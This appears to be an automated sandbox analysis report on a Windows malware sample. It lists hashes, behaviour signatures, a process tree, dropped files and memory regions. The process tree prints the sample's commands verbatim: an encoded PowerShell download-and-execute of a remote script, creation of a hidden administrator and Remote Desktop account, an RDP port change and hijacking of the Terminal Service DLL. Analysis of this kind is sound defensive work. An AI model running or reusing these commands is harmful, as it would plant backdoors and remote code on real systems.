Analysis
-
max time kernel
110s -
max time network
121s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
05-12-2021 07:54
General
-
Target
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
-
Size
4.6MB
-
MD5
f616975d69da372f403d58ba955dc510
-
SHA1
e22fcb3ec811cba8d74d4f897d495f21e8c88224
-
SHA256
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
-
SHA512
2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe"C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1123.tmp" "c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17BA.tmp" "c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc o18EWFWJ /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc o18EWFWJ /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc o18EWFWJ /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc o18EWFWJ1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc o18EWFWJ2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc o18EWFWJ3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES1123.tmpMD5
56f6783e8460c1f78a233cca6f73a100
SHA1457abddbd948afd765ffb4e8f6f0ff80138ad4b2
SHA2561b764879f9a4608afa482a3396f81c08c9c500e1e5973fa09a4f815d6264e356
SHA512b065ffe4ad15568740145e675c41f9f314dea9ad645c371b26b7354bb18e315973d6cbd5da6ae015c246c6812fc46bbe05221311b40d36cac6ac8679a4796b4b
-
C:\Users\Admin\AppData\Local\Temp\RES17BA.tmpMD5
0a1edf3372d4b98b768f820cdff07d11
SHA19a03265e760731fb89813202c2a90a677ae89df3
SHA2561bcfae685002b93e3f0a187e2bfbbcec65dbc2b46bc72a7e8f72b9e695c44ea1
SHA512839b3f088360b0dc934643723d0babb7b85491109bd0d9cabddbc561df3addffa1a9c864ff17db16e8c4cb97db28e7c8232b4bdd3c78865c22a00aa1b8762020
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
906cfa662334c891a46689a3f1da9330
SHA1eeea78f5017291d2bcc9455977849c075077a14a
SHA2565d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
SHA5127d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.dllMD5
09a68093dad29028b020aeeea9329b1d
SHA162a9b5f375813d4917b42249d95cc8f0d9cd5142
SHA256cd8b18073ecc484ff15c22fe7f263a8bf95ea978c0c6958495997f856a0a6f1b
SHA512de32307d15a4110a02c46179921e238edaa992c788a7e1d49a173672212fc204ea049ed255a6d7cdbcc30fa51a11d0fde1de2b8f0ef884835277a5fd696ce707
-
C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.dllMD5
6f19a0dbc09b64d3dd218d77e6eb903c
SHA1e765633c09e689a492e49b5b3cb40c3a3167223a
SHA256ee7e0d3807cbf64be54ee1579eeb519bafa4523ef8474862e844325be345df3c
SHA51224c18b39ae01b5cc4cc00d37933f1edd690dc392b495f13a83826f85bf3a6e1eb58e0dcc349894fe0e786a82b6cfdcdf9fb1d5c040ffccbdfc133981ebfc19c2
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMPMD5
2062d6b60fb3014ccd61c20cc56e7986
SHA19c3dff7f6553eed53597513f55240a8b89bb211b
SHA2568b1fa6516df1816052da07a421e7901bdaf9645cbbaa7f115db6cfd2dc3f6287
SHA5129faf57c764ba8f6738afaad3ca0e23209cef2952687621d7a6dfeeaf6016e65534312b56862a229197d2a0c093c0fca5b803927197ebd91258885f74a891af8c
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdlineMD5
15e43ff3b62e9f8f111785d5d854613d
SHA112d27c534d685433787d61088a7a592a38d9d560
SHA2564570df7b3c3a4fe0975b222084f32e4f4ccbdb70ef406aea04f33fbf4c1cf993
SHA51280fef049432b8ad94f7d5db86926b0bda1aa2a6f046da5e43b04a1fdcb8aa308544390d2bb0c48bf8240cc5623d7b490591cfb695c9f907e278c2c5151d242af
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMPMD5
b77d73717cbab75c6615b2fad6b4eea0
SHA1413c1b8c94b59ac08eee72d3ef421df9c360ddfd
SHA256a5559257806e58c8bb58d29a1a4613b8169c93d7c0f6bfcd066661e83512d4d0
SHA51233653fa1770caeaa8b4b620e67a58c1186061df607e43359f8eefd5f4ccb3ec88bb3b5e1a16b16fcc38eb8ffd052941812416150396209d34dddca7c2ebdac0c
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdlineMD5
d4c76f845369468645e3e7ac75aca481
SHA19673558eab6cfe7bc9035be194970a13a92bdbe1
SHA256f6b044879224573c462ae7d46335bd8c0a82dab869f333889b2019906acf7f6f
SHA5126dee4de3a3f514fbc59c754ae16a720794f981a846942ca8609bd29a8234b38e38b3d7a2e6fd957640eeea00d630868d896675610ff7c95d3af67593a2ccf5a7
-
\Windows\Branding\mediasrv.pngMD5
b5a099246bec080e384b19fff56bb2cc
SHA16f26990f3f471717c97dca80a2ccbf2eac952280
SHA256352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA51269dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
-
\Windows\Branding\mediasvc.pngMD5
cc59270baf11196c3414204c319f3be9
SHA1038e2aa526fad8eb762e21e9aed7eab4531d4e11
SHA2565c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
SHA5128e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-
memory/8-351-0x0000000000000000-mapping.dmp
-
memory/520-160-0x0000021CEC5F8000-0x0000021CEC5F9000-memory.dmpFilesize
4KB
-
memory/520-156-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-131-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-138-0x0000021CEC5F3000-0x0000021CEC5F5000-memory.dmpFilesize
8KB
-
memory/520-139-0x0000021CEC5F6000-0x0000021CEC5F8000-memory.dmpFilesize
8KB
-
memory/520-137-0x0000021CEC5F0000-0x0000021CEC5F2000-memory.dmpFilesize
8KB
-
memory/520-126-0x0000021CEC5A0000-0x0000021CEC5A1000-memory.dmpFilesize
4KB
-
memory/520-128-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-162-0x0000021CEDD60000-0x0000021CEDD61000-memory.dmpFilesize
4KB
-
memory/520-125-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-124-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-123-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-146-0x0000021CEC710000-0x0000021CEC711000-memory.dmpFilesize
4KB
-
memory/520-122-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-161-0x0000021CED9D0000-0x0000021CED9D1000-memory.dmpFilesize
4KB
-
memory/520-121-0x0000000000000000-mapping.dmp
-
memory/520-129-0x0000021CEC780000-0x0000021CEC781000-memory.dmpFilesize
4KB
-
memory/520-127-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-135-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-155-0x0000021CEC750000-0x0000021CEC751000-memory.dmpFilesize
4KB
-
memory/584-367-0x0000000000000000-mapping.dmp
-
memory/752-352-0x0000000000000000-mapping.dmp
-
memory/884-142-0x0000000000000000-mapping.dmp
-
memory/1036-308-0x0000000000000000-mapping.dmp
-
memory/1048-360-0x0000000000000000-mapping.dmp
-
memory/1304-148-0x0000000000000000-mapping.dmp
-
memory/1388-250-0x0000000000000000-mapping.dmp
-
memory/1388-291-0x00000159997A8000-0x00000159997AA000-memory.dmpFilesize
8KB
-
memory/1388-290-0x00000159997A6000-0x00000159997A8000-memory.dmpFilesize
8KB
-
memory/1388-264-0x00000159997A3000-0x00000159997A5000-memory.dmpFilesize
8KB
-
memory/1388-263-0x00000159997A0000-0x00000159997A2000-memory.dmpFilesize
8KB
-
memory/1456-362-0x0000000000000000-mapping.dmp
-
memory/1712-176-0x0000024D28B60000-0x0000024D28B62000-memory.dmpFilesize
8KB
-
memory/1712-172-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-178-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-180-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-198-0x0000024D28B66000-0x0000024D28B68000-memory.dmpFilesize
8KB
-
memory/1712-170-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-221-0x0000024D28B68000-0x0000024D28B6A000-memory.dmpFilesize
8KB
-
memory/1712-171-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-169-0x0000000000000000-mapping.dmp
-
memory/1712-177-0x0000024D28B63000-0x0000024D28B65000-memory.dmpFilesize
8KB
-
memory/1712-173-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-175-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1884-365-0x0000000000000000-mapping.dmp
-
memory/1904-371-0x0000000000000000-mapping.dmp
-
memory/1964-261-0x0000022050226000-0x0000022050228000-memory.dmpFilesize
8KB
-
memory/1964-223-0x0000022050223000-0x0000022050225000-memory.dmpFilesize
8KB
-
memory/1964-222-0x0000022050220000-0x0000022050222000-memory.dmpFilesize
8KB
-
memory/1964-210-0x0000000000000000-mapping.dmp
-
memory/1980-370-0x0000000000000000-mapping.dmp
-
memory/1984-366-0x0000000000000000-mapping.dmp
-
memory/2176-356-0x0000000000000000-mapping.dmp
-
memory/2536-136-0x0000000000000000-mapping.dmp
-
memory/2612-359-0x0000000000000000-mapping.dmp
-
memory/2800-363-0x0000000000000000-mapping.dmp
-
memory/2820-383-0x000001FDF9A53000-0x000001FDF9A55000-memory.dmpFilesize
8KB
-
memory/2820-390-0x000001FDF9A56000-0x000001FDF9A58000-memory.dmpFilesize
8KB
-
memory/2820-441-0x000001FDF9A58000-0x000001FDF9A59000-memory.dmpFilesize
4KB
-
memory/2820-346-0x0000000000000000-mapping.dmp
-
memory/2820-382-0x000001FDF9A50000-0x000001FDF9A52000-memory.dmpFilesize
8KB
-
memory/2820-374-0x0000000000000000-mapping.dmp
-
memory/3032-350-0x0000000000000000-mapping.dmp
-
memory/3084-369-0x0000000000000000-mapping.dmp
-
memory/3160-355-0x0000000000000000-mapping.dmp
-
memory/3172-353-0x0000000000000000-mapping.dmp
-
memory/3180-345-0x0000000000000000-mapping.dmp
-
memory/3396-373-0x0000000000000000-mapping.dmp
-
memory/3456-368-0x0000000000000000-mapping.dmp
-
memory/3464-306-0x0000000000000000-mapping.dmp
-
memory/3548-364-0x0000000000000000-mapping.dmp
-
memory/3576-354-0x0000000000000000-mapping.dmp
-
memory/3580-455-0x0000000000000000-mapping.dmp
-
memory/3640-151-0x0000000000000000-mapping.dmp
-
memory/3704-307-0x0000000000000000-mapping.dmp
-
memory/3812-349-0x0000000000000000-mapping.dmp
-
memory/3816-372-0x0000000000000000-mapping.dmp
-
memory/3924-456-0x0000000000000000-mapping.dmp
-
memory/3988-361-0x0000000000000000-mapping.dmp
-
memory/4064-117-0x000001B0A5DE0000-0x000001B0A5DE2000-memory.dmpFilesize
8KB
-
memory/4064-120-0x000001B0A5DE6000-0x000001B0A5DE7000-memory.dmpFilesize
4KB
-
memory/4064-119-0x000001B0A5DE5000-0x000001B0A5DE6000-memory.dmpFilesize
4KB
-
memory/4064-118-0x000001B0A5DE3000-0x000001B0A5DE5000-memory.dmpFilesize
8KB
-
memory/4064-115-0x000001B0C0150000-0x000001B0C041E000-memory.dmpFilesize
2.8MB
